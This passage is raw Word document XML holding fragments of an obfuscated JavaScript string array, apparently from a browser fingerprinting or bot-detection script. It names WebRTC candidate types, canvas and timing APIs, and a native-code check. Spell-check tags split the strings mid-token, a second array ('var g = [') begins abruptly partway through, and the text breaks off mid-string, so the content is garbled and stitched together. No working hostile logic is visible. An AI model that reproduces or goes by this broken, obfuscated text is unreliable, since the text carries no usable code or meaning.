        <w:t>", "DAq_KtBhCp9B", "OkzZWLBJVN8lJ6Sr4wxI_vJsQg4", "d8wx-lv-7inSvlI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host|srflx|prflx|relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "LB2XYORpTA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lF_ccdZFWA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cgs", "complete", "zEmUCOVVUqRSKb6hl2MT", "mcA1vkDj7xaYwFA9Pf_vVRiOr_usMNwZ1w", "rif6eQ", "width", "vT7OBqMcIPsAYoXAwU1aoQ", "data", "9BfnFIpTXsUoB-OXsQ", "U8hWjiKAgQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ssADyyXfiiv_73Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BgzjaYYyDdIBSQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZxfBULQVVP0pYbyixSUI56FnJRdPyWGy", "uhiUJg","yxOcO78uCu8uDIjR", "JAD7Xpp5TNBQUdy5pVFB0cU_MS8-lUHbCw", "BYdN226SiQeV8nltac4", "RzT_PZA3L8lcW4o", "vXLVPLJgYJckRtu3tm5R7-Z5HQ", "5AaiC853Xw", "qW-_eth2AY9oWdGYvEdkjcdSESwNqhvSBLnNnSQ5iD7prE14JyM0abxxilfrhauZcHLbVXvlM4bKFNftf6VMXYFWcBjSyZoEs_qj-CyLlk46jz4OvjUfixEe1bBWLyM11AFKkTxyGFChmb9NA5HTQnOkguW46szh51YpbGh4G3yNk5hlWyuGpTTT62ofOKqPM3GsJS4gQWOPxEgcCjOglae43cTPI50STLl_lszMHlbZlYjdDyRJ0zY", "4W6sZb0", "Ud8LkALOwlPlpDkXPZzNfiqp2P2D", "yLcKg1bFsAE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MH-mP81CVJk", "2rIU0WTI3iOZvyF-S5jKfiWi4djhW_x4-xJxI_uVaNULQame-I3Hi0yBfrsaYgFm285litcK32Ig-QhBj06ms177lfgyY2WvD0R8VMNncqTXUJL-Vd_xOs6zMFC2hdyeaL-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>VPdOe_LpMRhOi73U5r6wJZwVYQDNKW-j2wIqJ-5B6cX2LhIdoR8QkDZvAlUN_wNtTjpKens9tNajw_dFFe3gUMyY_1HvjrFWSYT0g8bk_ZFdw5tS6eZwnwwcSoyur4LTN_Us7DAuSXKH_fb8oNm2cNrZHChdDbcnOqCR-H7zPK0v41BFq4f3fTNc-gBFEcmUDUH0Nw3w8RJ8wVVnD5aicumkgkIcT8_0KUiMMqnpYA5XVV_xpiuTkYLcfOhNGfaxda_f5Oe2XsvzyraMqYfd4YWM8ZIJPWX8bT5Qj-o86eFuKyT1po1K_wQydaWwJAlZ15DzxTs_up35x5BSVIBLNSwVtA0X-soOvyMxyGd0lUr1saX_zDTPe5M69GkMDHYrd8p3kK5B80c24B2KxwWRGESTiex6redfeKWGn4YslXgsWuw6WpEJIDgSrV7nu2qi3LOnSouDBv5y0GKoQM1rEMTyOyg6CFMkFUBbRxvHOVC0DkMhEyGP2KTa6IzhkWlfiG1j7MD0SnwuHpMcrRBOmhDOPnKDpdcZPXPgER_oDtZVgL7iyJeVArmBjNdoG0GRyqrd0af1I0Z9o9fFO2g-c-Cqc_YPqCcXJBnwlCsYuD_J0zIq7B5Df90gUYx1xHu2C4sP8P0VDpTAMrU1tIHIX_eEgtB-vHWOS7C9TqlzfAi_-3538dszBf_eLsuPL", "JJN32A-Ht12-hwQ1C-qTI0G3pPGKdeR2gw5dQKyidq87dbiSkLA", "8D-SIrkt", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UIEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hV_pN50", "-k_kGb4aQN5eQNfq_zo", "elHAOfhQRcAsOJif3g", "LhesdeF6WpocDMCyjzd-x40Q", "NALlSco4cw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SubmitEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "FALSE", "L-w6", "__proto__", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hvFLuD70zmyDz28QBg", "80", "KgiAaO59R9AycrmDmVgFoMdxUw", "D6cA8jg", "s8xXkxWj", "TV-EJ-oPM7BcAOLj6itW", "Vst8vQSgz0_wqkEXbN73Cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EK0fy03e", "YLMJvnny_jWXsk8QQA", "fQiOKPZ1FLsFCbrf2FoHstosXygWuCKSBA", "\uD83D\uDE0E", "_jqSTO5LQOk1", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "UGTEI5p0eo0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oEueBKhsMKVMdqE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9Uv6kjmkR_v3QZdc66oVCeY2anKftIjh3FFUaS3F7YWYee1_O3rs3WpRg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lLkggXWN_Tf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_", "7_RV5H7ynzaSxk1ZI8SyTmem1g", "unshift", "z9cngRSLxwbX5Wsncw", "join", "MxuHVr8", "g_BIgD2e_GGkgSZVGoW7", "xsE41lzKmEvKhVFkfL_ofzOLsLzXQc8foj9RaN_hWpR2arz_upyMuAv5a_UFFgAmo7Yf25poxyIBkjpszEI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>phTGBoA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PFWgNNJiUOZhSNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CaUlx2XXyAmW", "xcwXq27T6TLs_g", "v7ZJx1-Tigk", "_kuzK9dOeYJMY8Kf", "QT-oP9tIMIUL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fireEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cos", "29gvq1r3lQPv", "length", "g_F7yCmlqlLbwG8", "D6YnlWrl8w", "LRLMTYU4Fus", "BFawKMF2cJ9BUM2Ip3I9itxbZz0ysxGPRe7esgA9gwO3oE53DChxKe9Fi0_qk9WONyjgNzzoYbCME6T3ObU", "YqFIunXFvS0", "kdJ-kCa0hHbD0QI", "9_gq7kn62Rbc", "Pq4dkyXB_zGG2gR8aOngEXuN", "ITTVfKM8I-M", "T2fc", "lxa9a59ZFdBATt7v22U7ntRLUnEr80eHNuLt-g", "J88uxn66", "rO4Wwg_1nSrD9j0", "OginKcB-DpcIQffNvTl-1aIA", "2j36OZYx", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TATsWZgTF_ksCsk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "which", "8Z8DkBy47BS5kWxVHt6CcCnJsuaGHNAuv2cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isFinite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CowoiE3w9QSGkEM0S8U", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yFHcXIY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4gL6ZIkTMv44QIiS3GMtsOxlNCo-", "VHnNef8UE5ZTCfE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JRPcVrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vs1HhQGKjCPJ7GYFf-DYcX75koSnDg", "V9pPuAe2zizXoGs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aqUexmiN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "start", "QmrhA5gOKw", "uM9b4iao1n3nqS0ORqbeaBOogcLOcfI43w", "33GIQ_tAWaNrKOaztUIuoehs", "performance", "console", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decodeURIComponent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"XTj2XogcT5ISG9-TsRYzjdEeMXc", "6jy9dcFbdg", "mr1BtGLEjQ","axg", "iTPoeZk0LPstSA", "2hv-DY0DGqcZAs_mtWgs", "replace", "JluJSIZvLZxPdrTvu29Cp_t8Kjwk0T8", "Ftgei2PYxwXfpzMx", "left", "S9g53gSqsDvO5z5FBw", "OXuUFNB3X615QerGqSp68g", "ZlOte8pHOaZ_SaLBgB4V1rYx", "gsI-pF345wnYpAMUP9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charCodeAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1-5v_hXqo0A", "tWesfvtkIZhBX4i1uEs3ndBLVUIvrl4", "Uf8hnVG8", "IlTGXc5yPc5qWY2i1w", "-JEnhiKZ9GHKqBYEWKTUMwfXkObLOQ", "nDW2MsBlKLASDoU", "LP1cyTGU9mbbvX4nTP4", "7z2QUcBAYYQENPa7uw", "0-oi2GChgwE", "tLxPykuRskq2owNRXQ", "^https?:\\\x2F\\\x2F", "m1a_T4VDfJxWBJHBkGo", "c6xj2BGP2k-SglcGLcurGEiJqfOhAoBZp3wUJcmyfNI", "6vE8xHbFsHP0", "X4EyvHOy4jjm6mA7JuCYPQ6CsvD9", "1wH_EYYRDos", "Y5dcuWvEsCP_kipOH8WIehW_h97wTYpppRc", "-_cGwHvugBrYxQphPK65egiU-fTPBw", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ALafvxP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "JoAerg8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SErfHKI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "L-MOlkflqwjd9CQzfMmibjzx5dDwBqAuug", "LZN-rwm31l-Nk0wDPNTgFUT_iemJLg", "mN9ukDuLlUrZh0sS", "split", "TRUE", "P6U6iHnc-VuoiSIn", "rUDgfI05SuxqBcOb5w", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xnkMOwsD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-QA", "8y2WPMViX7woO8-Q33EPp_E7EXkfqzT2Ag", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WjnwZtwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eZQXvHrlnyk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "fYg5sH0", "description", "r8dU5CGmjg", "szHoa9cLF44QbNvf13kvig", "Jcpx-yD9jEq1", "d9w", "c5l66wm14Q2t", "aC-XFdxdYp8", "zyLEJ6wwIrMvJP_RikUZj8VtGAsutSzpBpn3ymg", "AhWuE511EK4HebbU8zB8kocLSA", "VIYx9k-EjQaa41g", "oHneEeAkDrlQeLzb9nNc5ecwMRUlhzL-YN3g9X9Erl4", "L0-1IsZ2Pr9gG5mZoypo-aUQKC5j4ULUc5S08G13zwM", "OYgF91bz2iSl9CQB", "done", "3zD2NIA1Ug", "qYMh03jhySI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>initCustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Uint8Array", "create", "Intl", "(?:)", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unescape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "di-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TXupMZZA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EX7iAQ", "mark", "gnvzO9c", "p4EC7nb-", "rY9n7AE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sjTceA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "zNMWnX_KkDLh5g", "\uD83D\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uDCCA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jYxHyAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zkbjQA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "mYMHkVHZ42SNsjEB", "1tVSthGkjw", "log", "head", "push", "constructor", "sin", "fs4knQ_B-Abh4X89P92qSWb5_a6TDQ", "uEHlbIswK7F8V9vL4ldnhYg", "2bMV0GXJ3yKTojdKC6SReCSv4_GnX_9uugA2bpvnMJFNGPzfj_-akEGeKJJqdQJ3gMQjxo9-2A", "6pdJn0yI6CuwungsHpKdfzk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AvNA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "3M4V932vszHn9xg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8AvjZ5k", "Xgb_f-0tCvQ7GQ", "KEzYL4kJOs9kZob8jA1f0aZuOzV68FXc", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NkKvQcZRQuBLTY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x", "Rw6bN4JAaaMvC9uNpQE61w","FO1mhwDM4iCDwHEeEpHyXw", "lTTSMbwrPOQjOO_n1VgVt9R-FExG8ySwDYyo4QcZ_Dg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "imnhLZE2QcJcHA", "1", "cl3kFc9IHvtm", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNEKhBLR-Hrvkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "SMlA9UGJiV7NwThnR-vbLCmjjsKt", "0FnNSoYwP5RHffvo2m4", "3i_Ra7cqIe8mMLek", &gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "QnegWe5abZtfVg", "name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bDKbeclZUqkceQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_","ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfWBNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKHPdcbV1aSHJc9cGk_Sr7ZkwZdOoz9FHit8m5I68GyYuYYsWpdRyowbVw2rUhVPbZYP3ypmrLmgQoCnrE1ieUsLQE9tVwnNbb6YcBLlprUFvNpHiB_VI9GTerNW9Skm8qJgJsFU98BWkRBDOpxQwE-PK48g4EgBH6-_UV0hXHZ6mz6A0JdaXUC7UrPYPv3lA1E0BG2AT2xYXUAenmRn-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>zRraJCAbMAPMNgQXHZLwTtzfqlBiIYAv_6wqjtXbcN3KSOHVqrqBAmNj_YUjqNSf7qC1eEjphNbDAuhjizxGJ8LnSGJcbLstOsQtOgzvngma6fL4x_WEzmDAmptzC1e9J7dX7cs96pOHtkrrZp31TGCRycFgoJIALePS6UFhkuun6YnLgVYnqPqgXjqNrgGvFlVeMhYNwpk7pDDaDIK8Yml1ZGE4Az4gBo0J9QTN96_-hX5tBx5BegzQOskZrIRbrqI1tKdv4BLtdH5LmTdKvvoyxrCR0FPsv4-uWDHXRcg1NkgnVOGVoblZhTvXbJBUSc3wFgjzvDNw_K67eBQ-H1H8qwmY2zfa3rdkPD4glhfd1g3wvUxrnFxeBU44UVcVNzY3OvAJBb4aKw5BAh_Tj_JA8xcZ-PtPoctuB7JE6z8QLbjC10Sls0L51lmgIa8PrHg8_xJTnA7nqgPKa_0MJoUq3uN6MHHEaeMvWSS2RzNv0gvPHEJKbXiuRCeSf9uXKnH8hwE136DNk1pmhE0dfxQOd9ERe9vj61FtNXeGUTXuB-Mlb7cUeeFgBrEoAHLOxuiKtrsvUqSDIUZ8ErLDgErFHbc0CnqmpCQyCycFNU2mPpiAY52bfaFDsBaYLy7UR1DRAXI4p5ar-8dBRVHvMDE1N9aS2kRBGHbW69u9ubvERwgVsEYiVFsxDqa3f7UMrv_t3--fHYAIyFy_R5Tz94TERj2nJCpatV1qrfYYk9tu0Wh-hBekQryBSWXGYUvx_DhIHkeVgsvlLoq9jGPC-_RYc1KlGLbQdS65vpIIDbM66I_C08tw-Y91GotdlP_ssSlEl0FujZy94hBKacDPu53LajqoDlgWOhKpzv1bkZe0sNOLMNoEEuB7UzHOOzyKslJNLpxTx3yqy79HDsE7A9WLAOovLAMON_L4FKnOFX2l_9N2ajn-D64TQylqlcrbG6mTg_UCrdHx_nKAsVm3Qzy8YjnOMQGRCixVlMtMhvXOVHtu-fvMGLX41NC4S09DeB5oCh_urcx9KR8KSRIFhaCTtJn-oTQlutcxKH5Ao32Tzha1XX1wPE5eiQ6-LrVZgEQiUcUKHZJ4dgfyrBHYCsorIb_PX6QsrW3R9vK0PmkRZtuoz__xsa5z-Zc1sVFdm3S_iJq7DWx66VnoqhDMfqK4rhzVe7r9pmbF9Jugj2ya_YP-v7_0r-9cSLbJRE28BBDvqZ5rnJpeGjz-WqDQ__nmeAYjcZcN40WxI6hU81mbBpXA6RvFEqgIR1i0l_Hmewkx3ABrE9lJ95U5__rthBQcS5fsIDTecK9oixzyHTHeQ-lN-c3CpwZLtH16r_0hbootQX038z4OU1QipYoxHDJ9Iqzis0pnoadVoME9ap6U0aeFSCw1gkIFcqkTcyuPbDCKaqx7Yr1Bahgi87BuofsBHg6SPb57i23_vNf7z77SDuVyCRKo5lbgOoY_R2eaI3WiUYhAobVjNTwcp2_pBf2bY74Kg-HSNRG46uGR4iby_J10QDg1tOWQtTvhcPjCLmr3Ucb-437Z9-tQ8BTnm4HYuQojk_i1mvsmahuTJCK6cbZKjxOitmuuG3auaKpE2PbAFaQbymWEj0TH4vEuqyNYuy5yb5oMdG5l-FztQEVI7sWKsZILXJu7uXLsvUO18DiJhBoMvdLNXQKlMfizJb_QG2EEspMpEIVy8GShymsVORDmq33NOokDIqwYxsXg6aZtknsFWvTOv0paZ-BD70j17KFIiTp552_Raos7BFHcgsY_v4D46sA8CtZo0_lglJWMlDrRZkVPlfmcorkhRHSZmewXQMdwIhO7B2nmvcHmAEUQz8YDXDJ3ZpUuj9oEtMb_BNCUc94Z4RAdCAMT7QUIGisS0CB_dInj9clJkJeaB8WvXaEBfPT-7pi8XP6rUXA5AxUMmrGG7TBWrV5UlqG5eEgEv3lfo3uAlFQ7HI8dNS2xr4nN_LsPJZmv0JlLPqXdV3fhzk7GaCO0kzfUbno3beo8DwOEhCblIhquyaRVWwwGupay_LvafHcDpgWOqJsFxHPFYYVbxtI9z8q78yfovXzi7IH_RV5WozfdDpF6J3JknwXJuZSmv7IAfq6vPulZt7gJAWwoBeW_U</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
